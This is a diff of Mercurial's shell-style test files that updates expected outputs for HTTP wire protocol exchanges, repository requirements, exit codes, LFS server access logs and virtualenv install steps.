\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending heads command s> setsockopt(6, 1, 1) -> None (?) s> POST /api/exp-http-v2-0003/ro/heads HTTP/1.1\r\n @@ -437,7 +442,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -474,7 +479,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -745,7 +750,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -29,7 +29,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 9 files to transfer, 715 bytes of data + 9 files to transfer, 715 bytes of data (no-zstd !) + 9 files to transfer, 717 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) updating to branch default 4 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -348,20 +349,20 @@ list of changesets: 7f4e523d01f2cc3765ac8934da3d14db775ff872 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload sending unbundle command - sending 1040 bytes + sending 1023 bytes devel-peer-request: POST http://localhost:$HGPORT2/?cmd=unbundle - devel-peer-request: Content-length 1040 + devel-peer-request: Content-length 1023 devel-peer-request: Content-type application/mercurial-0.1 devel-peer-request: Vary X-HgArg-1,X-HgProto-1 devel-peer-request: X-hgproto-1 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull devel-peer-request: 16 bytes of commands arguments in headers - devel-peer-request: 1040 bytes of data + devel-peer-request: 1023 bytes of data devel-peer-request: finished in *.???? seconds (200) (glob) bundle2-input-bundle: no-transaction bundle2-input-part: "reply:changegroup" (advisory) (params: 0 advisory) supported @@ -382,6 +383,7 @@ devel-peer-request: 16 bytes of commands arguments in headers devel-peer-request: finished in *.???? seconds (200) (glob) received listkey for "phases": 15 bytes + (sent 9 HTTP requests and * bytes; received * bytes in responses) (glob) (?) $ hg rollback -q $ sed 's/.*] "/"/' < ../access.log @@ -503,7 +505,7 @@ requesting all changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] $ cat error.log disable pull-based clones @@ -515,7 +517,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] #if no-reposimplestore ... but keep stream clones working diff --git a/tests/test-inherit-mode.t b/tests/test-inherit-mode.t --- a/tests/test-inherit-mode.t +++ b/tests/test-inherit-mode.t @@ -134,6 +134,8 @@ 00660 ../push/.hg/00changelog.i 00770 ../push/.hg/cache/ 00660 ../push/.hg/cache/branch2-base + 00660 ../push/.hg/cache/rbc-names-v1 + 00660 ../push/.hg/cache/rbc-revs-v1 00660 ../push/.hg/dirstate 00660 ../push/.hg/requires 00770 ../push/.hg/store/ diff --git a/tests/test-init.t b/tests/test-init.t --- a/tests/test-init.t +++ b/tests/test-init.t @@ -21,6 +21,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -59,6 +61,8 @@ $ hg --config format.usestore=false init old $ checknewrepo old generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 testonly-simplestore (reposimplestore !) sparserevlog @@ -70,6 +74,8 @@ store created 00changelog.i created generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -83,6 +89,8 @@ 00changelog.i created fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -96,6 +104,8 @@ 00changelog.i created dotencode fncache + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 store testonly-simplestore (reposimplestore !) @@ -213,6 +223,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -233,6 +245,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -249,6 +263,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-install.t b/tests/test-install.t --- a/tests/test-install.t +++ b/tests/test-install.t @@ -184,7 +184,7 @@ $ cd $TESTTMP $ unset PYTHONPATH -#if py3 ensurepip +#if py3 ensurepip network-io $ "$PYTHON" -m venv installenv >> pip.log Hack: Debian does something a bit different in ensurepip.bootstrap. This makes @@ -197,8 +197,10 @@ Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log Failed building wheel for mercurial (?) + WARNING: You are using pip version *; however, version * is available. (glob) (?) + You should consider upgrading via the '$TESTTMP/installenv/bin/python* -m pip install --upgrade pip' command. (glob) (?) $ ./installenv/*/hg debuginstall || cat pip.log checking encoding (ascii)... checking Python executable (*) (glob) @@ -222,17 +224,17 @@ no problems detected #endif -#if virtualenv no-py3 +#if virtualenv no-py3 network-io Note: --no-site-packages is the default for all versions enabled by hghave - $ "$PYTHON" -m virtualenv --never-download installenv >> pip.log + $ "$PYTHON" -m virtualenv installenv >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality. (?) diff --git a/tests/test-largefiles-misc.t b/tests/test-largefiles-misc.t --- a/tests/test-largefiles-misc.t +++ b/tests/test-largefiles-misc.t @@ -675,6 +675,7 @@ searching for changes no changes found largefiles: no files to upload + [1] check messages when there are files to upload: diff --git a/tests/test-largefiles.t b/tests/test-largefiles.t --- a/tests/test-largefiles.t +++ b/tests/test-largefiles.t @@ -1751,7 +1751,7 @@ $ hg rm sub2/large6 $ hg up -r. abort: outstanding uncommitted merge - [255] + [20] - revert should be able to revert files introduced in a pending merge $ hg revert --all -r . diff --git a/tests/test-lfconvert.t b/tests/test-lfconvert.t --- a/tests/test-lfconvert.t +++ b/tests/test-lfconvert.t @@ -99,6 +99,8 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-lfs-largefiles.t b/tests/test-lfs-largefiles.t --- a/tests/test-lfs-largefiles.t +++ b/tests/test-lfs-largefiles.t @@ -293,6 +293,8 @@ fncache generaldelta lfs + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-lfs-serve-access.t b/tests/test-lfs-serve-access.t --- a/tests/test-lfs-serve-access.t +++ b/tests/test-lfs-serve-access.t @@ -66,7 +66,7 @@ $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $ rm -f $TESTTMP/access.log $TESTTMP/errors.log @@ -110,9 +110,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files @@ -167,7 +165,7 @@ $LOCALIP - - [$LOGDATE$] "POST /missing/objects/batch HTTP/1.1" 404 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /subdir/mount/point/.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point/.hg/lfs/objects/f03217a32529a28a42d03b1244fe09b6e0f9fd06d7b966d4d50567be2abe6c0e HTTP/1.1" 200 - (glob) @@ -313,7 +311,7 @@ $ cat $TESTTMP/access.log $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) @@ -332,7 +330,7 @@ $LOCALIP - - [$LOGDATE$] "PUT /.hg/lfs/objects/b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c HTTP/1.1" 422 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 500 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) @@ -483,7 +481,7 @@ $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 200 - (glob) diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -293,7 +293,7 @@ requesting all changes remote: abort: no common changegroup version abort: pull failed on remote - [255] + [100] $ grep 'lfs' $TESTTMP/client4_pull/.hg/requires $SERVER_REQUIRES $TESTTMP/server/.hg/requires:lfs @@ -462,6 +462,7 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 1 changes to 1 files + (sent 8 HTTP requests and * bytes; received * bytes in responses) (glob) (?) $ grep 'lfs' .hg/requires $SERVER_REQUIRES .hg/requires:lfs $TESTTMP/server/.hg/requires:lfs diff --git a/tests/test-lfs-test-server.t b/tests/test-lfs-test-server.t --- a/tests/test-lfs-test-server.t +++ b/tests/test-lfs-test-server.t @@ -17,7 +17,7 @@ #endif #if no-windows git-server - $ lfs-test-server &> lfs-server.log & + $ lfs-test-server > lfs-server.log 2>&1 & $ echo $! >> $DAEMON_PIDS #endif @@ -40,6 +40,8 @@ #endif $ cat >> $HGRCPATH <<EOF + > [ui] + > paginate=no > [experimental] > lfs.worker-enable = False > [extensions] @@ -113,7 +115,7 @@ Status: 200 (git-server !) Status: 201 (hg-server !) Content-Length: 0 - Content-Type: text/plain; charset=utf-8 + Content-Type: text/plain; charset=utf-8 (hg-server !) Date: $HTTP_DATE$ Server: testing stub value (hg-server !) lfs: processed: 